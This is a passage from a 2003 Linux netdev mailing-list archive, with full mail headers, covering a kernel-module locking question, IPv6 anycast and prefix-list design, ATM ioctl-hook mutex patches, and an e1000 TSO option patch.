text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4031 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 17:06:14 -0400 chas williams wrote: > this should be applied to the latest 2.5 sources... Applied, thanks. From kumarkr@us.ibm.com Mon Jul 14 17:28:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:28:58 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0SjFl018246 for ; Mon, 14 Jul 2003 17:28:52 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6F0SUc8249838; Mon, 14 Jul 2003 20:28:30 -0400 Received: from d03nm801.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6F0SQbT054882; Mon, 14 Jul 2003 18:28:27 -0600 Subject: Re: Kernel locking up in module To: N N Ashok Cc: netdev@oss.sgi.com, Stephen Hemminger X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: From: Krishna Kumar Date: Mon, 14 Jul 2003 17:28:25 -0700 X-MIMETrack: Serialize by Router on D03NM801/03/M/IBM(Release 6.0.1 [IBM]|June 10, 2003) at 07/14/2003 18:28:29 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII X-archive-position: 4032 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kumarkr@us.ibm.com Precedence: bulk X-list: netdev > > but the variable is non-null every other time I insert the module. Are you adding any new devices after the init() routine executes ? You seem to have exited the for loop due to bwusage becoming NULL, not the dev (while both should be null). > You are not locking out the bottom half receive thread so it will deadlock Stephen, I don't understand how this is a deadlock ? His handler runs only in the bottom half and he has no other code which runs in regular or hard interrupt context. But you might want to try doing the mod_timer after dropping the lock to avoid a race (though not very likely ?). Unless it is re-entrant, which seems unlikely since he is using a 1 second timeout. BTW, you are assigning 'data' in your routine, which is OK, unsigned long *data = (unsigned long *) ptr; but if you reference it, that will crash the system since it is referring to a local stack variable of another routine. - KK |---------+----------------------------> | | N N Ashok | | | | | | Sent by: | | | netdev-bounce@oss| | | .sgi.com | | | | | | | | | 07/14/2003 04:35 | | | PM | | | | |---------+----------------------------> >-----------------------------------------------------------------------------------------------------------------| | | | To: Stephen Hemminger | | cc: netdev@oss.sgi.com | | Subject: Re: Kernel locking up in module | | | >-----------------------------------------------------------------------------------------------------------------| On Monday 14 July 2003 18:49, Stephen Hemminger scrawled: > On Mon, 14 Jul 2003 17:46:30 -0400 > > N N Ashok wrote: > > Hi All, > > I am creating a module to measure the outgoing bandwidth usage on the > > interfaces. It uses the get_stats() of the device to get the current > > stats and then computes the bandwidth usage. The algorithm for the usage > > calculation are borrowed from iproute2 package (tc/tc_estimator.c). The > > problem is that the kernel keeps locking up. I am using rwlock_t locks to > > lock the data. In the code, I traverse the list of bwuage structures and > > as a debug message am printing whether the traversal ended in the > > variable becoming null (which it should if everything went right), but > > the variable is non-null every other time I insert the module. > > printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? > > "non-null" : "null", bwusage ? "non-null" : "null"); > > > > I think this has got to do with some locking issues. As this is my > > first go at the kernel locking, I might have used the wrong kind of > > locks. I have attached the module source, header and the log messages as > > I inserted the module a couple of times. I request you all to please help > > me as I am totally lost here. > > > > Thanks, > > Ashok > > You are not locking out the bottom half receive thread so it will deadlock > when it runs while your code holds the top half lock. Hi Stephen, Thanks for the reply. Do I used write_lock_bh()/write_unlock_bh() for my lock (bwusage_head_lock) while still using read_lock() for dev_base_lock ? Thanks, Ashok From kuznet@ms2.inr.ac.ru Mon Jul 14 17:29:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 17:29:57 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F0TqFl018558 for ; Mon, 14 Jul 2003 17:29:53 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA06610; Tue, 15 Jul 2003 04:29:44 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307150029.EAA06610@dub.inr.ac.ru> Subject: Re: [PATCH] IPv6: Fix broken anycast usage To: mika.liljeberg@welho.COM (Mika Liljeberg) Date: Tue, 15 Jul 2003 04:29:44 +0400 (MSD) Cc: netdev@oss.sgi.com In-Reply-To: <1057997590.1142.31.camel@hades> from "Mika Liljeberg" at éÀÌ 12, 2003 12:45:01 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4033 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > this doesn't need to be policed. In general, there is no reliable way to > check if a remote address is anycast, anyway. From RFC2461: > > Note that an anycast address is syntactically > indistinguishable from a unicast address. This is right. (Well, except for the fact that reserved anycasts are very well syntactically distinguished. :-)) But this does not matter, the patch is correct, ANYCAST is an additional attribute on unicast addresses and it should be checked only in contexts where _this_ host is a member of this anycast. BTW it is an addendum to my previous mail. You were right complaining about EINVAL for anycast nexthop. However: Nexthop address is unique identifier of nexthop router. We do not enforce this policy (see comments in route.c), hence it is bug to reject such routes and you are right, but this does not make your example more reasonable. Any non-unicast non-linklocal address used as nexthop is bad idea, this policy is not enforced to allow use of global nexthops on BGP routers, where it is convenient to use global addresses for nexthop resolution and where it is legal because they are not expected to receive redirects This is legal in your case of PtP link too, however, this is still nasty. Alexey From kuznet@ms2.inr.ac.ru Mon Jul 14 18:18:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 18:18:22 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F1IBFl020106 for ; Mon, 14 Jul 2003 18:18:12 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id FAA06705; Tue, 15 Jul 2003 05:17:53 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307150117.FAA06705@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Tue, 15 Jul 2003 05:17:53 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, kuznet@ms2.inr.ac.ru, krkumar@us.ibm.com In-Reply-To: from "Krishna Kumar" at éÀÌ 14, 2003 03:35:15 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4034 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > inet6_fill_ifaddr (and introduce RTM_IFACEFLAGS). This will be specific to > IPv6. Are you agreeable to this ? ... > + IFA_IFFLAGS, What's about ifa_flags? There is some space there, and the things kept there now: TENTATIVE/DEPRECATED et al. are close relatives of O/M. > - I believe we need #3 for the reasons given above. This does not pass through Occam's razor. Why not to give a filter to plain RTM_GETROUTE? We did not implement filtering not because we do not want, but because we (me, is more appropriate) are lazy. Also, I am not sure that the interface should include things sort of + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | + IPV6_ADDR_MULTICAST)) != 0 || + addr_type == IPV6_ADDR_ANY) For kernel all they are direct routes, if the application wants to apply some policy not formulated in terms of filters for RTM_GETROUTE, let it to filter itself. Moreover, I used to emphasize that user of rtnetlink should not believe to reliability of kernel filtering. It is just necessary measure to guarantee that a new application, which is aware of a new attribute, will behave correctly with older kernels, which are not aware of this attribute. Not a requirement, of course. Anyway, if you want to apply such specific policy, you can add a flag to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX and base filtering on this flag, when it is given. Alexey From chas@locutus.cmf.nrl.navy.mil Mon Jul 14 20:01:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 20:02:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F31XFl022011 for ; Mon, 14 Jul 2003 20:01:33 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6EL8fsG021288; Mon, 14 Jul 2003 17:08:41 -0400 (EDT) Message-Id: <200307142108.h6EL8fsG021288@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] cleanup pppoatm and br2684 modules Reply-To: chas3@users.sourceforge.net Date: Mon, 14 Jul 2003 17:06:14 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4035 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev this should be applied to the latest 2.5 sources... [atm]: cleanup pppoatm_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1362 -> 1.1363 # net/atm/pppoatm.c 1.7 -> 1.8 # net/atm/common.h 1.13 -> 1.14 # net/atm/common.c 1.38 -> 1.39 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/21 chas@relax.cmf.nrl.navy.mil 1.1363 # pppoatm.c, common.h, common.c: # cleanup pppoatm_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 09:45:58 2003 +++ b/net/atm/common.c Mon Jun 23 09:45:58 2003 @@ -129,8 +129,19 @@ #endif #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) -int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); -EXPORT_SYMBOL(pppoatm_ioctl_hook); +static DECLARE_MUTEX(pppoatm_ioctl_mutex); + +static int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + down(&pppoatm_ioctl_mutex); + pppoatm_ioctl_hook = hook; + up(&pppoatm_ioctl_mutex); +} +#ifdef CONFIG_PPPOATM_MODULE +EXPORT_SYMBOL(pppoatm_ioctl_set); +#endif #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) @@ -865,12 +876,14 @@ default: break; } + error = -ENOIOCTLCMD; #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) - if (pppoatm_ioctl_hook) { + down(&pppoatm_ioctl_mutex); + if (pppoatm_ioctl_hook) error = pppoatm_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&pppoatm_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) if (br2684_ioctl_hook) { diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 23 09:45:58 2003 +++ b/net/atm/common.h Mon Jun 23 09:45:58 2003 @@ -26,6 +26,8 @@ void atm_shutdown_dev(struct atm_dev *dev); +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); + int atmpvc_init(void); void atmpvc_exit(void); int atmsvc_init(void); diff -Nru a/net/atm/pppoatm.c b/net/atm/pppoatm.c --- a/net/atm/pppoatm.c Mon Jun 23 09:45:58 2003 +++ b/net/atm/pppoatm.c Mon Jun 23 09:45:58 2003 @@ -44,6 +44,8 @@ #include #include +#include "common.h" + #if 0 #define DPRINTK(format, args...) \ printk(KERN_DEBUG "pppoatm: " format, ##args) @@ -344,17 +346,15 @@ /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) -extern int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - static int __init UNUSED pppoatm_init(void) { - pppoatm_ioctl_hook = pppoatm_ioctl; + pppoatm_ioctl_set(pppoatm_ioctl); return 0; } static void __exit UNUSED pppoatm_exit(void) { - pppoatm_ioctl_hook = NULL; + pppoatm_ioctl_set(NULL); } module_init(pppoatm_init); [atm]: cleanup br2684_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1363 -> 1.1364 # net/atm/br2684.c 1.3 -> 1.4 # net/atm/common.h 1.14 -> 1.15 # net/atm/common.c 1.39 -> 1.40 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/21 chas@relax.cmf.nrl.navy.mil 1.1364 # common.h, common.c, br2684.c: # cleanup br2684_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/br2684.c b/net/atm/br2684.c --- a/net/atm/br2684.c Mon Jun 23 09:45:37 2003 +++ b/net/atm/br2684.c Mon Jun 23 09:45:37 2003 @@ -16,9 +16,12 @@ #include #include #include +#include +#include #include +#include "common.h" #include "ipcommon.h" /* @@ -768,8 +771,6 @@ extern struct proc_dir_entry *atm_proc_root; /* from proc.c */ -extern int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) @@ -779,14 +780,14 @@ if ((p = create_proc_entry("br2684", 0, atm_proc_root)) == NULL) return -ENOMEM; p->proc_fops = &br2684_proc_operations; - br2684_ioctl_hook = br2684_ioctl; + br2684_ioctl_set(br2684_ioctl); return 0; } static void __exit UNUSED br2684_exit(void) { struct br2684_dev *brdev; - br2684_ioctl_hook = NULL; + br2684_ioctl_set(NULL); remove_proc_entry("br2684", atm_proc_root); while (!list_empty(&br2684_devs)) { brdev = list_entry_brdev(br2684_devs.next); diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 09:45:37 2003 +++ b/net/atm/common.c Mon Jun 23 09:45:37 2003 @@ -145,9 +145,18 @@ #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) -int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); +static DECLARE_MUTEX(br2684_ioctl_mutex); + +static int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + down(&br2684_ioctl_mutex); + br2684_ioctl_hook = hook; + up(&br2684_ioctl_mutex); +} #ifdef CONFIG_ATM_BR2684_MODULE -EXPORT_SYMBOL(br2684_ioctl_hook); +EXPORT_SYMBOL(br2684_ioctl_set); #endif #endif @@ -886,11 +895,12 @@ goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) - if (br2684_ioctl_hook) { + down(&br2684_ioctl_mutex); + if (br2684_ioctl_hook) error = br2684_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&br2684_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif error = atm_dev_ioctl(cmd, arg); diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 23 09:45:37 2003 +++ b/net/atm/common.h Mon Jun 23 09:45:37 2003 @@ -27,6 +27,7 @@ void atm_shutdown_dev(struct atm_dev *dev); void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); int atmpvc_init(void); void atmpvc_exit(void); From scott.feldman@intel.com Mon Jul 14 21:42:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:43:30 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4gpFl023956 for ; Mon, 14 Jul 2003 21:42:51 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6F4avj01043 for ; Tue, 15 Jul 2003 04:36:57 GMT Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6F4bsU09258 for ; Tue, 15 Jul 2003 04:37:54 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071421424104145 ; Mon, 14 Jul 2003 21:42:41 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 21:42:41 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [patch] e1000 TSO parameter Date: Mon, 14 Jul 2003 21:42:40 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [patch] e1000 TSO parameter Thread-Index: AcNKZ+mReyrU+xYURTSavf3gjrZ7aQAHMc8w From: "Feldman, Scott" To: Cc: , X-OriginalArrivalTime: 15 Jul 2003 04:42:41.0290 (UTC) FILETIME=[866FF6A0:01C34A8B] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6F4gpFl023956 X-archive-position: 4036 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev [Moving over to netdev] > Hi Scott, > > Would you mind applying the attached patch for the e1000 > driver? The patch adds a "TSO" option which lets you disable > TSO at boot-time/module-insertion time. This is useful for > experimentation and, on fast machines, you can actually get > better netperf numbers with TSO disabled. ;-) This is interesting. I assume you're trying to get the best throughput regardless of CPU utilization. Why are we getting lower throughput rates? It's an open question for netdev. Do you have any data to share? > Note that I had to move the e1000_check_options() call to a > slighly earlier place. You may want to double-check that > it's really OK. I'm not too keen on adding another module parameter. Maybe a CONFIG_E1000_TSO option? > The patch is relative to 2.5.75. > > Thanks, > > --david > > # This is a BitKeeper generated patch for the following > project: # Project Name: Linux kernel tree # This patch > format is intended for GNU patch command version 2.5 or > higher. # This patch includes the following deltas: > # ChangeSet 1.1379 -> 1.1380 > # drivers/net/e1000/e1000.h 1.33 -> 1.34 > # drivers/net/e1000/e1000_main.c 1.77 -> 1.78 > # drivers/net/e1000/e1000_param.c 1.21 -> 1.22 > # > # The following is the BitKeeper ChangeSet Log > # -------------------------------------------- > # 03/07/14 davidm@tiger.hpl.hp.com 1.1380 > # Make it possible to disable TSO at module-load time (or > boot-time). # This is controlled via the TSO parameter (e.g., > modprobe e1000 TSO=0,0,0,0 # will disable TSO on the first 4 > e1000 NICs). # -------------------------------------------- > # > diff -Nru a/drivers/net/e1000/e1000.h b/drivers/net/e1000/e1000.h > --- a/drivers/net/e1000/e1000.h Mon Jul 14 17:29:30 2003 > +++ b/drivers/net/e1000/e1000.h Mon Jul 14 17:29:30 2003 > @@ -194,6 +194,7 @@ > uint32_t tx_head_addr; > uint32_t tx_fifo_size; > atomic_t tx_fifo_stall; > + boolean_t tso; > > /* RX */ > struct e1000_desc_ring rx_ring; > diff -Nru a/drivers/net/e1000/e1000_main.c > b/drivers/net/e1000/e1000_main.c > --- a/drivers/net/e1000/e1000_main.c Mon Jul 14 17:29:30 2003 > +++ b/drivers/net/e1000/e1000_main.c Mon Jul 14 17:29:30 2003 > @@ -417,9 +417,12 @@ > netdev->features = NETIF_F_SG; > } > > + e1000_check_options(adapter); > + > #ifdef NETIF_F_TSO > if((adapter->hw.mac_type >= e1000_82544) && > - (adapter->hw.mac_type != e1000_82547)) > + (adapter->hw.mac_type != e1000_82547) && > + adapter->tso) > netdev->features |= NETIF_F_TSO; > #endif > > @@ -469,7 +472,6 @@ > > printk(KERN_INFO "%s: Intel(R) PRO/1000 Network Connection\n", > netdev->name); > - e1000_check_options(adapter); > > /* Initial Wake on LAN setting > * If APM wake is enabled in the EEPROM, > diff -Nru a/drivers/net/e1000/e1000_param.c > b/drivers/net/e1000/e1000_param.c > --- a/drivers/net/e1000/e1000_param.c Mon Jul 14 17:29:30 2003 > +++ b/drivers/net/e1000/e1000_param.c Mon Jul 14 17:29:30 2003 > @@ -192,6 +192,16 @@ > > E1000_PARAM(InterruptThrottleRate, "Interrupt Throttling Rate"); > > +/* Enable TSO - TCP Segmentation Offload Enable/Disable > + * > + * Valid Range: 0, 1 > + * - 0 - disables TSO > + * - 1 - enables TSO on NICs that are TSO capable > + * > + * Default Value: 1 > + */ > +E1000_PARAM(TSO, "Disable or enable TSO"); > + > #define AUTONEG_ADV_DEFAULT 0x2F > #define AUTONEG_ADV_MASK 0x2F > #define FLOW_CONTROL_DEFAULT FLOW_CONTROL_FULL > @@ -454,6 +464,18 @@ > } else { > e1000_validate_option(&adapter->itr, &opt); > } > + } > + { /* TSO Enable/Disable */ > + struct e1000_option opt = { > + .type = enable_option, > + .name = "TSO", > + .err = "defaulting to Enabled", > + .def = OPTION_ENABLED > + }; > + > + int tso = TSO[bd]; > + e1000_validate_option(&tso, &opt); > + adapter->tso = tso; > } > > switch(adapter->hw.media_type) { > From davem@redhat.com Mon Jul 14 21:54:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:55:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4sQFl024415 for ; Mon, 14 Jul 2003 21:54:26 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA12652; Mon, 14 Jul 2003 21:45:10 -0700 Date: Mon, 14 Jul 2003 21:45:10 -0700 From: "David S. Miller" To: "Feldman, Scott" Cc: davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030714214510.17e02a9f.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4037 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003 21:42:40 -0700 "Feldman, Scott" wrote: > > Note that I had to move the e1000_check_options() call to a > > slighly earlier place. You may want to double-check that > > it's really OK. > > I'm not too keen on adding another module parameter. Maybe a > CONFIG_E1000_TSO option? Extend ethtool please :-) From davidm@napali.hpl.hp.com Mon Jul 14 21:57:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 21:57:45 -0700 (PDT) Received: from palrel12.hp.com (palrel12.hp.com [156.153.255.237]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4v6Fl024761 for ; Mon, 14 Jul 2003 21:57:11 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel12.hp.com (Postfix) with ESMTP id 9407B1C00C78; Mon, 14 Jul 2003 21:57:06 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6F4v51A008719; Mon, 14 Jul 2003 21:57:06 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6F4v5rK026648; Mon, 14 Jul 2003 21:57:05 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6F4v5Mk026644; Mon, 14 Jul 2003 21:57:05 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16147.35233.333351.492981@napali.hpl.hp.com> Date: Mon, 14 Jul 2003 21:57:05 -0700 To: "David S. Miller" Cc: "Feldman, Scott" , davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030714214510.17e02a9f.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4038 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Mon, 14 Jul 2003 21:45:10 -0700, "David S. Miller" said: DaveM> On Mon, 14 Jul 2003 21:42:40 -0700 "Feldman, Scott" DaveM> wrote: >> > Note that I had to move the e1000_check_options() call to a > >> slighly earlier place. You may want to double-check that > it's >> really OK. >> I'm not too keen on adding another module parameter. Maybe a >> CONFIG_E1000_TSO option? DaveM> Extend ethtool please :-) ethtool would be ideal, agreed. I absolutely think that this should be a runtime option, not a compile-time option. --david From scott.feldman@intel.com Mon Jul 14 22:11:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:11:53 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5BmFl025392 for ; Mon, 14 Jul 2003 22:11:49 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6F55wj14055 for ; Tue, 15 Jul 2003 05:05:58 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6F56tU25007 for ; Tue, 15 Jul 2003 05:06:55 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071422231301619 ; Mon, 14 Jul 2003 22:23:13 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 22:11:42 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [patch] e1000 TSO parameter Date: Mon, 14 Jul 2003 22:11:41 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [patch] e1000 TSO parameter Thread-Index: AcNKjXHm75RxR2SVR1G4lL8VbghgLgAAgskg From: "Feldman, Scott" To: "David S. Miller" Cc: , , X-OriginalArrivalTime: 15 Jul 2003 05:11:42.0275 (UTC) FILETIME=[94253130:01C34A8F] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6F5BmFl025392 X-archive-position: 4039 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > Extend ethtool please :-) Even better. This should be no problem. From davidm@napali.hpl.hp.com Mon Jul 14 22:31:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:31:37 -0700 (PDT) Received: from palrel12.hp.com (palrel12.hp.com [156.153.255.237]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5V2Fl026031 for ; Mon, 14 Jul 2003 22:31:02 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel12.hp.com (Postfix) with ESMTP id 29A9C1C018DE; Mon, 14 Jul 2003 22:31:02 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com 